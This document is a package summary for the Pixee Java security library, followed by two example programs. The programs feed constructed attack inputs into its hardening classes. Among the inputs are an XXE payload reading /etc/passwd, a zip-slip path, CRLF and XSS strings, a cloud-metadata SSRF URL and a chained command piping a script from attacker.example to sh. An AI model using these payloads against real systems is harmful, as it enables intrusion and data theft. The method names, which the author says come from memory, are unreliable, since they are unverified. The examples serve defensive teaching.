Module io.github.pixee.security
Package io.github.pixee.security
The intent of these types is to offer APIs that developers can use to implement common security tasks (input validation, output encoding, and hardening of risky JDK APIs).
Interface Summary

HostValidator: A type that validates hosts to be connected to.
JNDI.LimitedContext: A lookalike for Context that allows JNDI name resolution to be sandboxed.

Class Summary

BoundedLineReader: Helper methods for protecting I/O operations.
DocumentBuilderFactorySecurity: Helper methods that defend against XXE attacks in DocumentBuilderFactory.
Filenames: Utilities for safely dealing with filenames.
HtmlEncoder: Helper methods that defend against XSS attacks with HTML encoding.
JNDI: Utilities that defend against JNDI attacks by controlling the allowed resources.
Newlines: Helper methods that defend against newline-based attacks.
Reflection: Helper methods that defend against attacks involving reflection and classloading.
SystemCommand: Utility methods for running system commands more safely.
UnwantedTypes: Only intended to hold a list of types that we don't want to deserialize because they pose a security risk.
Urls: Utilities that help developers protect against server-side request forgery (SSRF) and any other attacks based on creating unvalidated URLs.
ValidatingObjectInputStreams: Helper methods that defend against Java deserialization attacks leveraging ObjectInputStream APIs by wrapping the stream in an Apache Commons IO ValidatingObjectInputStream that is configured to reject types known to be leveraged in deserialization attacks.
XMLDecoderSecurity: APIs to help secure the usage of XMLDecoder.
XMLInputFactorySecurity: Helper methods that defend against XXE attacks in XMLInputFactory.
ZipSecurity: Helper methods for dealing with attacks related to Zip operations, most notably the "zip slip" attack.

Enum Summary

ReflectionRestrictions: The set of restrictions developers can apply when using the Reflection APIs.
SystemCommandRestrictions: The restrictions that can be applied to a command run through SystemCommand.
UrlProtocol: The set of protocols that can be allowed in Urls methods (notice that "ANY" is an option).
XMLRestrictions: The set of restrictions that can be applied to a secured XML read.
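The following is an added example, not code from the package itself, showing how several of the classes above are meant to be dropped in front of untrusted input. The inputs (a traversal-style upload name, a header value carrying CR/LF, a "zip slip" entry name, an XXE payload) are constructed for the demonstration. Method names (Filenames.toSimpleFileName, Newlines.stripAll, HtmlEncoder.encode, BoundedLineReader.readLine, ZipSecurity.createHardenedInputStream, XMLInputFactorySecurity.hardenFactory, ValidatingObjectInputStreams.from) and the SecurityException raised on rejection are from my recollection of the library's Javadoc and should be checked against the individual class pages before relying on them.

```java
import io.github.pixee.security.BoundedLineReader;
import io.github.pixee.security.Filenames;
import io.github.pixee.security.HtmlEncoder;
import io.github.pixee.security.Newlines;
import io.github.pixee.security.ValidatingObjectInputStreams;
import io.github.pixee.security.XMLInputFactorySecurity;
import io.github.pixee.security.ZipSecurity;

import java.io.BufferedReader;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

/** Constructed inputs exercising the package's guards (example code, not the library's own). */
public class HardenedInputHandling {

    // Upload "filename" crafted to escape the upload directory.
    static final String UPLOAD_NAME = "../../etc/cron.d/evil";
    // Values about to be echoed into a response header and an HTML page.
    static final String HEADER_VALUE = "sessionid=1\r\nSet-Cookie: admin=true";
    static final String HTML_VALUE = "<script>alert(document.cookie)</script>";
    // Zip entry name used by "zip slip": naive extraction writes outside the target dir.
    static final String ZIP_SLIP_ENTRY = "../../../tmp/owned.txt";
    // Classic XXE payload.
    static final String XXE_DOC = "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE x [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>\n<x>&xxe;</x>";

    public static void main(String[] args) throws Exception {
        // Filenames: keep only the simple name, then resolve it under the upload dir yourself.
        System.out.println("filename : " + Filenames.toSimpleFileName(UPLOAD_NAME));

        // Newlines: remove CR/LF so the value cannot inject a second header or log line.
        System.out.println("header   : " + Newlines.stripAll(HEADER_VALUE));

        // HtmlEncoder: encode before interpolating into HTML.
        System.out.println("html     : " + HtmlEncoder.encode(HTML_VALUE));

        // BoundedLineReader: cap a single line so one huge line cannot exhaust the heap.
        BufferedReader reader = new BufferedReader(new StringReader("short\n" + "A".repeat(10_000)));
        System.out.println("line 1   : " + BoundedLineReader.readLine(reader, 1024));
        try {
            BoundedLineReader.readLine(reader, 1024);
        } catch (SecurityException e) {
            System.out.println("line 2   : rejected, exceeds 1024 chars");
        }

        // ZipSecurity: the hardened ZipInputStream refuses path-traversal entry names.
        byte[] archive = buildZip(ZIP_SLIP_ENTRY, "pwned");
        try (ZipInputStream zin = ZipSecurity.createHardenedInputStream(new ByteArrayInputStream(archive))) {
            ZipEntry entry = zin.getNextEntry();
            System.out.println("zip      : " + entry.getName());
        } catch (SecurityException e) {
            System.out.println("zip      : rejected zip-slip entry");
        }

        // XMLInputFactorySecurity: DOCTYPE / external entity resolution is disabled before parsing,
        // so the payload is either rejected outright or parsed with the entity left unresolved.
        XMLInputFactory factory = XMLInputFactorySecurity.hardenFactory(XMLInputFactory.newFactory());
        try {
            XMLStreamReader xr = factory.createXMLStreamReader(new StringReader(XXE_DOC));
            while (xr.hasNext()) { xr.next(); }
            System.out.println("xml      : parsed without fetching file:///etc/passwd");
        } catch (XMLStreamException e) {
            System.out.println("xml      : rejected (" + e.getMessage() + ")");
        }

        // ValidatingObjectInputStreams: readObject() goes through a ValidatingObjectInputStream
        // that rejects known gadget types before they are resolved; a plain String still round-trips.
        byte[] blob = serialize("hello");
        try (ObjectInputStream in = ValidatingObjectInputStreams.from(new ByteArrayInputStream(blob))) {
            System.out.println("deser    : " + in.readObject());
        }
    }

    /** Builds an in-memory zip with a single entry (constructed test data). */
    static byte[] buildZip(String entryName, String contents) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ZipOutputStream zout = new ZipOutputStream(bytes)) {
            zout.putNextEntry(new ZipEntry(entryName));
            zout.write(contents.getBytes(StandardCharsets.UTF_8));
            zout.closeEntry();
        }
        return bytes.toByteArray();
    }

    /** Java-serializes an object to bytes (constructed test data). */
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(bytes)) { out.writeObject(o); }
        return bytes.toByteArray();
    }
}
```

The pattern in each case is the same: the hardened call sits exactly where the unsafe JDK call used to be (ZipInputStream constructor, ObjectInputStream constructor, XMLInputFactory.newFactory()), so the rest of the code path does not change and a rejected input surfaces as an exception at the point of entry rather than as a side effect later.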
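An added example (not the library's own code) of how the four enums are combined with the classes they restrict. The untrusted inputs (a class name to load, a shell argument with command chaining, a cloud metadata URL) are constructed for the demonstration. The signatures used (Reflection.loadAndVerify with a restriction set, SystemCommand.runCommand with a restriction set, Urls.create with a protocol set and HostValidator, HostValidator.fromAllowedHostPattern, XMLInputFactorySecurity.hardenFactory with a restriction set) and the enum constant names are from my recollection of the library's Javadoc and should be verified against the linked class and enum pages.

```java
import io.github.pixee.security.HostValidator;
import io.github.pixee.security.Reflection;
import io.github.pixee.security.ReflectionRestrictions;
import io.github.pixee.security.SystemCommand;
import io.github.pixee.security.SystemCommandRestrictions;
import io.github.pixee.security.UrlProtocol;
import io.github.pixee.security.Urls;
import io.github.pixee.security.XMLInputFactorySecurity;
import io.github.pixee.security.XMLRestrictions;

import java.net.URL;
import java.util.EnumSet;
import java.util.Set;
import java.util.regex.Pattern;
import javax.xml.stream.XMLInputFactory;

/** Constructed inputs showing the restriction enums in use (example code, not the library's own). */
public class RestrictionSets {

    public static void main(String[] args) throws Exception {
        // ReflectionRestrictions: load a class by (untrusted) name, but only if it is public and
        // is not one of the types that lead straight to code execution.
        Set<ReflectionRestrictions> reflectionRules = EnumSet.of(
            ReflectionRestrictions.MUST_BE_PUBLIC,
            ReflectionRestrictions.MUST_NOT_INVOLVE_CODE_EXECUTION);
        Class<?> ok = Reflection.loadAndVerify("java.util.ArrayList", reflectionRules);
        System.out.println("reflection : loaded " + ok.getName());
        try {
            Reflection.loadAndVerify("java.lang.Runtime", reflectionRules);
        } catch (SecurityException e) {
            System.out.println("reflection : java.lang.Runtime rejected");
        }

        // SystemCommandRestrictions: the user-controlled argument tries to chain a second command.
        Set<SystemCommandRestrictions> commandRules = EnumSet.of(
            SystemCommandRestrictions.PREVENT_COMMAND_CHAINING,
            SystemCommandRestrictions.PREVENT_COMMON_EXPLOIT_EXECUTABLES,
            SystemCommandRestrictions.PREVENT_ARGUMENTS_TARGETING_SENSITIVE_FILES);
        String userArg = "report.txt; curl http://attacker.example/x | sh";
        try {
            SystemCommand.runCommand(Runtime.getRuntime(), "cat " + userArg, commandRules);
        } catch (SecurityException e) {
            System.out.println("command    : rejected chained command");
        }

        // UrlProtocol + HostValidator: HTTPS only, and only to our own API host. The second URL is
        // the kind of SSRF target (cloud metadata endpoint) an attacker supplies.
        HostValidator onlyOurApi = HostValidator.fromAllowedHostPattern(Pattern.compile("api\\.example\\.com"));
        Set<UrlProtocol> httpsOnly = EnumSet.of(UrlProtocol.HTTPS);
        URL allowed = Urls.create("https://api.example.com/v1/items", httpsOnly, onlyOurApi);
        System.out.println("url        : allowed " + allowed);
        try {
            Urls.create("http://169.254.169.254/latest/meta-data/", httpsOnly, onlyOurApi);
        } catch (SecurityException e) {
            System.out.println("url        : rejected metadata endpoint");
        }

        // XMLRestrictions: choose which defenses to apply when hardening a factory. Disallowing
        // DOCTYPE entirely is the stronger setting; use only DISALLOW_EXTERNAL_ENTITIES when
        // documents legitimately carry internal DTDs.
        XMLInputFactory strict = XMLInputFactorySecurity.hardenFactory(
            XMLInputFactory.newFactory(), EnumSet.of(XMLRestrictions.DISALLOW_DOCTYPE));
        XMLInputFactory lenient = XMLInputFactorySecurity.hardenFactory(
            XMLInputFactory.newFactory(), EnumSet.of(XMLRestrictions.DISALLOW_EXTERNAL_ENTITIES));
        System.out.println("xml        : hardened factories ready (" + strict + ", " + lenient + ")");
    }
}
```

Note that UrlProtocol.ANY exists for callers that genuinely need every scheme; pairing it with HostValidator.ALLOW_ALL disables the SSRF defense entirely, so treat that combination as a code-review flag rather than a default.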